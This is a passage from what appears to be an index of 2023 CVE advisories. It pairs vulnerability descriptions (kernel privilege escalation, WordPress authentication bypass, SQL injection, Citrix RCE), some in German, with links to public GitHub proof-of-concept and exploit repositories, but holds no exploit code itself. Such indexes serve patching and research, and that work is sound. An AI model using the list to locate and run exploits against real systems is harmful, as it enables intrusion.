In Rockoa 2.3.2 wurde eine Schwachstelle ausgemacht. Sie wurde als kritisch eingestuft. Hierbei betrifft es unbekannten Programmcode der Datei webmainConfig.php der Komponente Configuration File Handler. Durch Beeinflussen mit unbekannten Daten kann eine code injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
- [CTF-Archives/xinhu-v2.3.2](https://github.com/CTF-Archives/xinhu-v2.3.2)
### CVE-2023-1829 (2023-04-12)
A use-after-free vulnerability in the Linux Kernel traffic control index filter (tcindex) can be exploited to achieve local privilege escalation. The tcindex_delete function which does not properly deactivate filters in case of a perfect hashes while deleting the underlying structure which can later lead to double freeing the structure. A local attacker user can use this vulnerability to elevate its privileges to root.\nWe recommend upgrading past commit 8c710f75256bb3cf05ac7b1672c82b92c43f3d28.\n\n
- [lanleft/CVE-2023-1829](https://github.com/lanleft/CVE-2023-1829)
### CVE-2023-1874 (2023-04-12)
The WP Data Access plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.3.7. This is due to a lack of authorization checks on the multiple_roles_update function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wpda_role[]' parameter during a profile update. This requires the 'Enable role management' setting to be enabled for the site.
- [thomas-osgood/cve-2023-1874](https://github.com/thomas-osgood/cve-2023-1874)
### CVE-2023-2002 (2023-05-26)
A vulnerability was found in the HCI sockets implementation due to a missing capability check in net/bluetooth/hci_sock.c in the Linux Kernel. This flaw allows an attacker to unauthorized execution of management commands, compromising the confidentiality, integrity, and availability of Bluetooth communication.
- [lrh2000/CVE-2023-2002](https://github.com/lrh2000/CVE-2023-2002)
### CVE-2023-2008 (2023-04-14)
A flaw was found in the Linux kernel's udmabuf device driver. The specific flaw exists within a fault handler. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an array. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel.
- [bluefrostsecurity/CVE-2023-2008](https://github.com/bluefrostsecurity/CVE-2023-2008)
### CVE-2023-2023 (2023-05-30)
The Custom 404 Pro WordPress plugin before 3.7.3 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.
- [thatformat/Hvv2023](https://github.com/thatformat/Hvv2023)
- [druxter-x/PHP-CVE-2023-2023-2640-POC-Escalation](https://github.com/druxter-x/PHP-CVE-2023-2023-2640-POC-Escalation)
### CVE-2023-2024 (2023-05-18)
Improper authentication in OpenBlue Enterprise Manager Data Collector versions prior to 3.2.5.75 allow access to an unauthorized user under certain circumstances.
- [team890/CVE-2023-2024](https://github.com/team890/CVE-2023-2024)
### CVE-2023-2033 (2023-04-14)
Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
- [insoxin/CVE-2023-2033](https://github.com/insoxin/CVE-2023-2033)
- [sandumjacob/CVE-2023-2033-Analysis](https://github.com/sandumjacob/CVE-2023-2033-Analysis)
- [gretchenfrage/CVE-2023-2033-analysis](https://github.com/gretchenfrage/CVE-2023-2033-analysis)
- [mistymntncop/CVE-2023-2033](https://github.com/mistymntncop/CVE-2023-2033)
- [tianstcht/CVE-2023-2033](https://github.com/tianstcht/CVE-2023-2033)
### CVE-2023-2114 (2023-05-08)
The NEX-Forms WordPress plugin before 8.4 does not properly escape the `table` parameter, which is populated with user input, before concatenating it to an SQL query.
- [SchmidAlex/nex-forms_SQL-Injection-CVE-2023-2114](https://github.com/SchmidAlex/nex-forms_SQL-Injection-CVE-2023-2114)
### CVE-2023-2123 (2023-08-16)
The WP Inventory Manager WordPress plugin before 2.1.0.13 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
- [0xn4d/poc-cve-xss-encoded-wp-inventory-manager-plugin](https://github.com/0xn4d/poc-cve-xss-encoded-wp-inventory-manager-plugin)
### CVE-2023-2215 (2023-04-21)
Es wurde eine kritische Schwachstelle in Campcodes Coffee Shop POS System 1.0 entdeckt. Es betrifft eine unbekannte Funktion der Datei /admin/user/manage_user.php. Mittels Manipulieren des Arguments id mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
- [zwxxb/CVE-2023-2215](https://github.com/zwxxb/CVE-2023-2215)
### CVE-2023-2249 (2023-06-09)
The wpForo Forum plugin for WordPress is vulnerable to Local File Include, Server-Side Request Forgery, and PHAR Deserialization in versions up to, and including, 2.1.7. This is due to the insecure use of file_get_contents without appropriate verification of the data being supplied to the function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to retrieve the contents of files like wp-config.php hosted on the system, perform a deserialization attack and possibly achieve remote code execution, and make requests to internal services.
- [ixiacom/CVE-2023-2249](https://github.com/ixiacom/CVE-2023-2249)
### CVE-2023-2255 (2023-05-25)
Improper access control in editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice documents that used "floating frames" linked to external files, would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.7; 7.5 versions prior to 7.5.3.
- [elweth-sec/CVE-2023-2255](https://github.com/elweth-sec/CVE-2023-2255)
- [SaintMichae64/CVE-2023-2255](https://github.com/SaintMichae64/CVE-2023-2255)
### CVE-2023-2375 (2023-04-28)
Eine kritische Schwachstelle wurde in Ubiquiti EdgeRouter X bis 2.0.9-hotfix.6 gefunden. Es geht hierbei um eine nicht näher spezifizierte Funktion der Komponente Web Management Interface. Mittels Manipulieren des Arguments src mit unbekannten Daten kann eine command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung.
- [0x0jr/HTB-Devvortex-CVE-2023-2375-PoC](https://github.com/0x0jr/HTB-Devvortex-CVE-2023-2375-PoC)
### CVE-2023-2437 (2023-11-22)
The UserPro plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.1.1. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email. An attacker can leverage CVE-2023-2448 and CVE-2023-2446 to get the user's email address to successfully exploit this vulnerability.
- [RxRCoder/CVE-2023-2437](https://github.com/RxRCoder/CVE-2023-2437)
### CVE-2023-2516 (2023-05-05)
Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.7.
- [mnqazi/CVE-2023-2516](https://github.com/mnqazi/CVE-2023-2516)
### CVE-2023-2523 (2023-05-04)
Eine kritische Schwachstelle wurde in Weaver E-Office 9.5 ausgemacht. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei App/Ajax/ajax.php?action=mobile_upload_save. Mittels Manipulieren des Arguments upload_quwan mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
- [bingtangbanli/cve-2023-2523-and-cve-2023-2648](https://github.com/bingtangbanli/cve-2023-2523-and-cve-2023-2648)
- [Any3ite/CVE-2023-2523](https://github.com/Any3ite/CVE-2023-2523)
### CVE-2023-2579 (2023-07-17)
The InventoryPress WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow users with the role of author and above to perform Stored Cross-Site Scripting attacks.
- [0xn4d/poc-cve-xss-inventory-press-plugin](https://github.com/0xn4d/poc-cve-xss-inventory-press-plugin)
### CVE-2023-2591 (2023-05-09)
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in GitHub repository nilsteampassnet/teampass prior to 3.0.7.
- [mnqazi/CVE-2023-2591](https://github.com/mnqazi/CVE-2023-2591)
### CVE-2023-2594 (2023-05-09)
Es wurde eine Schwachstelle in SourceCodester Food Ordering Management System 1.0 gefunden. Sie wurde als kritisch eingestuft. Hiervon betroffen ist ein unbekannter Codeblock der Komponente Registration. Durch die Manipulation des Arguments username mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden.
- [thehackingverse/CVE-2023-2594](https://github.com/thehackingverse/CVE-2023-2594)
### CVE-2023-2598 (2023-06-01)
A flaw was found in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) in the Linux kernel that allows out-of-bounds access to physical memory beyond the end of the buffer. This flaw enables full local privilege escalation.
- [ysanatomic/io_uring_LPE-CVE-2023-2598](https://github.com/ysanatomic/io_uring_LPE-CVE-2023-2598)
- [cainiao159357/CVE-2023-2598](https://github.com/cainiao159357/CVE-2023-2598)
### CVE-2023-2636 (2023-07-17)
The AN_GradeBook WordPress plugin through 5.0.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber
- [lukinneberg/CVE-2023-2636](https://github.com/lukinneberg/CVE-2023-2636)
### CVE-2023-2640 (2023-07-26)
On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.
- [OllaPapito/gameoverlay](https://github.com/OllaPapito/gameoverlay)
- [luanoliveira350/GameOverlayFS](https://github.com/luanoliveira350/GameOverlayFS)
- [g1vi/CVE-2023-2640-CVE-2023-32629](https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629)
- [musorblyat/CVE-2023-2640-CVE-2023-32629](https://github.com/musorblyat/CVE-2023-2640-CVE-2023-32629)
- [SanjayRagavendar/Ubuntu-GameOver-Lay](https://github.com/SanjayRagavendar/Ubuntu-GameOver-Lay)
- [Nkipohcs/CVE-2023-2640-CVE-2023-32629](https://github.com/Nkipohcs/CVE-2023-2640-CVE-2023-32629)
- [K5LK/CVE-2023-2640-32629](https://github.com/K5LK/CVE-2023-2640-32629)
### CVE-2023-2650 (2023-05-30)
Issue summary: Processing some specially crafted ASN.1 object identifiers or\ndata containing them may be very slow.\n\nImpact summary: Applications that use OBJ_obj2txt() directly, or use any of\nthe OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message\nsize limit may experience notable to very long delays when processing those\nmessages, which may lead to a Denial of Service.\n\nAn OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers -\nmost of which have no size limit. OBJ_obj2txt() may be used to translate\nan ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL\ntype ASN1_OBJECT) to its canonical numeric text form, which are the\nsub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by\nperiods.\n\nWhen one of the sub-identifiers in the OBJECT IDENTIFIER is very large\n(these are sizes that are seen as absurdly large, taking up tens or hundreds\nof KiBs), the translation to a decimal number in text may take a very long\ntime. The time complexity is O(n^2) with 'n' being the size of the\nsub-identifiers in bytes (*).\n\nWith OpenSSL 3.0, support to fetch cryptographic algorithms using names /\nidentifiers in string form was introduced. This includes using OBJECT\nIDENTIFIERs in canonical numeric text form as identifiers for fetching\nalgorithms.\n\nSuch OBJECT IDENTIFIERs may be received through the ASN.1 structure\nAlgorithmIdentifier, which is commonly used in multiple protocols to specify\nwhat cryptographic algorithm should be used to sign or verify, encrypt or\ndecrypt, or digest passed data.\n\nApplications that call OBJ_obj2txt() directly with untrusted data are\naffected, with any version of OpenSSL. If the use is for the mere purpose\nof display, the severity is considered low.\n\nIn OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME,\nCMS, CMP/CRMF or TS. It also impacts anything that processes X.509\ncertificates, including simple things like verifying its signature.\n\nThe impact on TLS is relatively low, because all versions of OpenSSL have a\n100KiB limit on the peer's certificate chain. Additionally, this only\nimpacts clients, or servers that have explicitly enabled client\nauthentication.\n\nIn OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects,\nsuch as X.509 certificates. This is assumed to not happen in such a way\nthat it would cause a Denial of Service, so these versions are considered\nnot affected by this issue in such a way that it would be cause for concern,\nand the severity is therefore considered low.
- [hshivhare67/OpenSSL_1.1.1g_CVE-2023-2650](https://github.com/hshivhare67/OpenSSL_1.1.1g_CVE-2023-2650)
### CVE-2023-2728 (2023-07-03)
Users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures pods running with a service account may only reference secrets specified in the service account’s secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the `kubernetes.io/enforce-mountable-secrets` annotation are used together with ephemeral containers.\n\n
- [Cgv-Dev/Metasploit-Module-TFM](https://github.com/Cgv-Dev/Metasploit-Module-TFM)
### CVE-2023-2732 (2023-05-25)
The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.
- [RandomRobbieBF/CVE-2023-2732](https://github.com/RandomRobbieBF/CVE-2023-2732)
- [Jenderal92/WP-CVE-2023-2732](https://github.com/Jenderal92/WP-CVE-2023-2732)
- [ThatNotEasy/CVE-2023-2732](https://github.com/ThatNotEasy/CVE-2023-2732)
### CVE-2023-2744 (2023-06-27)
The ERP WordPress plugin before 1.12.4 does not properly sanitise and escape the `type` parameter in the `erp/v1/accounting/v1/people` REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
- [pashayogi/CVE-2023-2744](https://github.com/pashayogi/CVE-2023-2744)
### CVE-2023-2822 (2023-05-20)
Es wurde eine problematische Schwachstelle in Ellucian Ethos Identity bis 5.10.5 ausgemacht. Hiervon betroffen ist ein unbekannter Codeblock der Datei /cas/logout. Durch Manipulation des Arguments url mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 5.10.6 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
- [cberman/CVE-2023-2822-demo](https://github.com/cberman/CVE-2023-2822-demo)
### CVE-2023-2825 (2023-05-26)
An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups.
- [Occamsec/CVE-2023-2825](https://github.com/Occamsec/CVE-2023-2825)
- [yuimarudev/CVE-2023-2825](https://github.com/yuimarudev/CVE-2023-2825)
- [Tornad0007/CVE-2023-2825-Gitlab](https://github.com/Tornad0007/CVE-2023-2825-Gitlab)
- [Rubikcuv5/CVE-2023-2825](https://github.com/Rubikcuv5/CVE-2023-2825)
- [caopengyan/CVE-2023-2825](https://github.com/caopengyan/CVE-2023-2825)
- [cc3305/CVE-2023-2825](https://github.com/cc3305/CVE-2023-2825)
### CVE-2023-2833 (2023-06-06)
The ReviewX plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.6.13 due to insufficient restriction on the 'rx_set_screen_options' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_screen_options[option]' and 'wp_screen_options[value]' parameters during a screen option update.
- [Alucard0x1/CVE-2023-2833](https://github.com/Alucard0x1/CVE-2023-2833)
### CVE-2023-2859 (2023-05-24)
Code Injection in GitHub repository nilsteampassnet/teampass prior to 3.0.9.
- [mnqazi/CVE-2023-2859](https://github.com/mnqazi/CVE-2023-2859)
### CVE-2023-2868 (2023-05-24)
A remote command injection vulnerability exists in the Barracuda Email Security Gateway (appliance form factor only) product effecting versions 5.1.3.001-9.2.0.006. The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives). The vulnerability stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker can specifically format these file names in a particular manner that will result in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product. This issue was fixed as part of BNSF-36456 patch. This patch was automatically applied to all customer appliances.
- [cfielding-r7/poc-cve-2023-2868](https://github.com/cfielding-r7/poc-cve-2023-2868)
- [cashapp323232/CVE-2023-2868CVE-2023-2868](https://github.com/cashapp323232/CVE-2023-2868CVE-2023-2868)
- [krmxd/CVE-2023-2868](https://github.com/krmxd/CVE-2023-2868)
### CVE-2023-2877 (2023-06-27)
The Formidable Forms WordPress plugin before 6.3.1 does not adequately authorize the user or validate the plugin URL in its functionality for installing add-ons. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins of arbitrary versions from the WordPress.org plugin repository onto the site, leading to Remote Code Execution.
- [RandomRobbieBF/CVE-2023-2877](https://github.com/RandomRobbieBF/CVE-2023-2877)
### CVE-2023-2916 (2023-08-15)
The InfiniteWP Client plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.11.1 via the 'admin_notice' function. This can allow authenticated attackers with subscriber-level permissions or above to extract sensitive data including configuration. It can only be exploited if the plugin has not been configured yet. If combined with another arbitrary plugin installation and activation vulnerability, it may be possible to connect a site to InfiniteWP which would make remote management possible and allow for elevation of privileges.
- [d0rb/CVE-2023-2916](https://github.com/d0rb/CVE-2023-2916)
### CVE-2023-2928 (2023-05-27)
In DedeCMS bis 5.7.106 wurde eine kritische Schwachstelle ausgemacht. Dabei geht es um eine nicht genauer bekannte Funktion der Datei uploads/dede/article_allowurl_edit.php. Durch das Manipulieren des Arguments allurls mit unbekannten Daten kann eine code injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
- [CN016/DedeCMS-getshell-CVE-2023-2928-](https://github.com/CN016/DedeCMS-getshell-CVE-2023-2928-)
### CVE-2023-2951 (2023-05-28)
Es wurde eine kritische Schwachstelle in code-projects Bus Dispatch and Information System 1.0 entdeckt. Es geht dabei um eine nicht klar definierte Funktion der Datei delete_bus.php. Durch die Manipulation des Arguments busid mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
- [Spr1te76/CVE-2023-2951](https://github.com/Spr1te76/CVE-2023-2951)
### CVE-2023-2982 (2023-06-29)
The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.
- [RandomRobbieBF/CVE-2023-2982](https://github.com/RandomRobbieBF/CVE-2023-2982)
- [H4K6/CVE-2023-2982-POC](https://github.com/H4K6/CVE-2023-2982-POC)
- [LoaiEsam37/CVE-2023-2982](https://github.com/LoaiEsam37/CVE-2023-2982)
- [wshinkle/CVE-2023-2982](https://github.com/wshinkle/CVE-2023-2982)
### CVE-2023-2986 (2023-06-08)
The Abandoned Cart Lite for WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.14.2. This is due to insufficient encryption on the user being supplied during the abandoned cart link decode through the plugin. This allows unauthenticated attackers to log in as users who have abandoned the cart, who are typically customers. Further security hardening was introduced in version 5.15.1 that ensures sites are no longer vulnerable through historical check-out links, and additional hardening was introduced in version 5.15.2 that ensured null key values wouldn't permit the authentication bypass.
- [Ayantaker/CVE-2023-2986](https://github.com/Ayantaker/CVE-2023-2986)
- [Alucard0x1/CVE-2023-2986](https://github.com/Alucard0x1/CVE-2023-2986)
### CVE-2023-3009 (2023-05-31)
Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.
- [mnqazi/CVE-2023-3009](https://github.com/mnqazi/CVE-2023-3009)
### CVE-2023-3047 (2023-06-13)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TMT Lockcell allows SQL Injection.This issue affects Lockcell: before 15.\n\n
- [Phamchie/CVE-2023-3047](https://github.com/Phamchie/CVE-2023-3047)
- [Kimsovannareth/Phamchie](https://github.com/Kimsovannareth/Phamchie)
### CVE-2023-3076 (2023-07-10)
The MStore API WordPress plugin before 3.9.9 does not prevent visitors from creating user accounts with the role of their choice via their wholesale REST API endpoint. This is only exploitable if the site owner paid to access the plugin's pro features.
- [im-hanzou/MSAPer](https://github.com/im-hanzou/MSAPer)
### CVE-2023-3079 (2023-06-05)
Type confusion in V8 in Google Chrome prior to 114.0.5735.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
- [mistymntncop/CVE-2023-3079](https://github.com/mistymntncop/CVE-2023-3079)
### CVE-2023-3124 (2023-06-07)
The Elementor Pro plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the update_page_option function in versions up to, and including, 3.11.6. This makes it possible for authenticated attackers with subscriber-level capabilities to update arbitrary site options, which can lead to privilege escalation.
- [AmirWhiteHat/CVE-2023-3124](https://github.com/AmirWhiteHat/CVE-2023-3124)
### CVE-2023-3163 (2023-06-08)
Es wurde eine problematische Schwachstelle in y_project RuoYi bis 4.7.7 ausgemacht. Es betrifft die Funktion filterKeyword. Mit der Manipulation des Arguments value mit unbekannten Daten kann eine resource consumption-Schwachstelle ausgenutzt werden.
- [George0Papasotiriou/CVE-2023-3163-SQL-Injection-Prevention](https://github.com/George0Papasotiriou/CVE-2023-3163-SQL-Injection-Prevention)
### CVE-2023-3244 (2023-08-17)
The Comments Like Dislike plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the restore_settings function called via an AJAX action in versions up to, and including, 1.1.9. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to reset the plugin's settings. NOTE: After attempting to contact the developer with no response, and reporting this to the WordPress plugin's team 30 days ago we are disclosing this issue as it still is not updated.
- [drnull03/POC-CVE-2023-3244](https://github.com/drnull03/POC-CVE-2023-3244)
### CVE-2023-3269 (2023-07-11)
A vulnerability exists in the memory management subsystem of the Linux kernel. The lock handling for accessing and updating virtual memory areas (VMAs) is incorrect, leading to use-after-free problems. This issue can be successfully exploited to execute arbitrary kernel code, escalate containers, and gain root privileges.
- [lrh2000/StackRot](https://github.com/lrh2000/StackRot)
### CVE-2023-3338 (2023-06-30)
A null pointer dereference flaw was found in the Linux kernel's DECnet networking protocol. This issue could allow a remote user to crash the system.
- [TurtleARM/CVE-2023-3338-DECPwn](https://github.com/TurtleARM/CVE-2023-3338-DECPwn)
### CVE-2023-3390 (2023-06-28)
A use-after-free vulnerability was found in the Linux kernel's netfilter subsystem in net/netfilter/nf_tables_api.c.\n\nMishandled error handling with NFT_MSG_NEWRULE makes it possible to use a dangling pointer in the same transaction causing a use-after-free vulnerability. This flaw allows a local attacker with user access to cause a privilege escalation issue.\n\nWe recommend upgrading past commit 1240eb93f0616b21c675416516ff3d74798fdc97.
- [flygonty/CVE-2023-3390_PoC](https://github.com/flygonty/CVE-2023-3390_PoC)
### CVE-2023-3450 (2023-06-28)
Eine kritische Schwachstelle wurde in Ruijie RG-BCR860 2.5.13 gefunden. Dies betrifft einen unbekannten Teil der Komponente Network Diagnostic Page. Durch das Manipulieren mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
- [yuanjinyuyuyu/CVE-2023-3450](https://github.com/yuanjinyuyuyu/CVE-2023-3450)
- [caopengyan/CVE-2023-3450](https://github.com/caopengyan/CVE-2023-3450)
### CVE-2023-3452 (2023-08-12)
The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server.
- [leoanggal1/CVE-2023-3452-PoC](https://github.com/leoanggal1/CVE-2023-3452-PoC)
### CVE-2023-3460 (2023-07-04)
The Ultimate Member WordPress plugin before 2.6.7 does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.
- [gbrsh/CVE-2023-3460](https://github.com/gbrsh/CVE-2023-3460)
- [rizqimaulanaa/CVE-2023-3460](https://github.com/rizqimaulanaa/CVE-2023-3460)
- [yon3zu/Mass-CVE-2023-3460](https://github.com/yon3zu/Mass-CVE-2023-3460)
- [EmadYaY/CVE-2023-3460](https://github.com/EmadYaY/CVE-2023-3460)
- [diego-tella/CVE-2023-3460](https://github.com/diego-tella/CVE-2023-3460)
- [Rajneeshkarya/CVE-2023-3460](https://github.com/Rajneeshkarya/CVE-2023-3460)
- [DiMarcoSK/CVE-2023-3460_POC](https://github.com/DiMarcoSK/CVE-2023-3460_POC)
- [julienbrs/exploit-CVE-2023-3460](https://github.com/julienbrs/exploit-CVE-2023-3460)
### CVE-2023-3519 (2023-07-19)
Unauthenticated remote code execution\n
- [telekom-security/cve-2023-3519-citrix-scanner](https://github.com/telekom-security/cve-2023-3519-citrix-scanner)
- [securekomodo/citrixInspector](https://github.com/securekomodo/citrixInspector)
- [mr-r3b00t/CVE-2023-3519](https://github.com/mr-r3b00t/CVE-2023-3519)
- [d0rb/CVE-2023-3519](https://github.com/d0rb/CVE-2023-3519)
- [BishopFox/CVE-2023-3519](https://github.com/BishopFox/CVE-2023-3519)
- [SalehLardhi/CVE-2023-3519](https://github.com/SalehLardhi/CVE-2023-3519)
- [KR0N-SECURITY/CVE-2023-3519](https://github.com/KR0N-SECURITY/CVE-2023-3519)
- [passwa11/CVE-2023-3519](https://github.com/passwa11/CVE-2023-3519)
- [rwincey/cve-2023-3519](https://github.com/rwincey/cve-2023-3519)
- [mandiant/citrix-ioc-scanner-cve-2023-3519](https://github.com/mandiant/citrix-ioc-scanner-cve-2023-3519)
- [Chocapikk/CVE-2023-3519](https://github.com/Chocapikk/CVE-2023-3519)
- [JonaNeidhart/CVE-2023-3519-BackdoorCheck](https://github.com/JonaNeidhart/CVE-2023-3519-BackdoorCheck)
- [Mohammaddvd/CVE-2023-3519](https://github.com/Mohammaddvd/CVE-2023-3519)
### CVE-2023-3640 (2023-07-24)
A possible unauthorized memory access flaw was found in the Linux kernel's cpu_entry_area mapping of X86 CPU data to memory, where a user may guess the location of exception stacks or other important data. Based on the previous CVE-2023-0597, the 'Randomize per-cpu entry area' feature was implemented in /arch/x86/mm/cpu_entry_area.c, which works through the init_cea_offsets() function when KASLR is enabled. However, despite this feature, there is still a risk of per-cpu entry area leaks. This issue could allow a local user to gain access to some important data with memory in an expected location and potentially escalate their privileges on the system.
- [pray77/CVE-2023-3640](https://github.com/pray77/CVE-2023-3640)
### CVE-2023-3710 (2023-09-12)
Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).\n\n
- [vpxuser/CVE-2023-3710-POC](https://github.com/vpxuser/CVE-2023-3710-POC)
### CVE-2023-3711 (2023-09-12)
Session Fixation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Session Credential Falsification through Prediction.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).\n\n
- [vpxuser/CVE-2023-3711-POC](https://github.com/vpxuser/CVE-2023-3711-POC)
### CVE-2023-3712 (2023-09-12)
Files or Directories Accessible to External Parties vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Privilege Escalation.This issue affects PM43 versions prior to P10.19.050004. \n\nUpdate to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).\n\n
- [vpxuser/CVE-2023-3712-POC](https://github.com/vpxuser/CVE-2023-3712-POC)
### CVE-2023-3824 (2023-08-11)
In PHP version 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE. \n\n
- [Starla2u/CVE-2023-3824-PHP-to-RCE-LockBit-LEAK](https://github.com/Starla2u/CVE-2023-3824-PHP-to-RCE-LockBit-LEAK)
- [jhonnybonny/CVE-2023-3824](https://github.com/jhonnybonny/CVE-2023-3824)
- [baesh3r/poc-CVE-2023-3824](https://github.com/baesh3r/poc-CVE-2023-3824)
### CVE-2023-3836 (2023-07-22)
In Dahua Smart Park Management bis 20230713 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Betroffen ist eine unbekannte Verarbeitung der Datei /emap/devicePoint_addImgIco?hasSubsystem=true. Durch Manipulation des Arguments upload mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
- [zh-byte/CVE-2023-3836](https://github.com/zh-byte/CVE-2023-3836)
### CVE-2023-3881 (2023-07-25)
In Campcodes Beauty Salon Management System 1.0 wurde eine kritische Schwachstelle entdeckt. Dabei geht es um eine nicht genauer bekannte Funktion der Datei /admin/forgot-password.php. Durch Manipulieren des Arguments contactno mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
- [AnugiArrawwala/CVE-Research](https://github.com/AnugiArrawwala/CVE-Research)
### CVE-2023-3897 (2023-07-25)
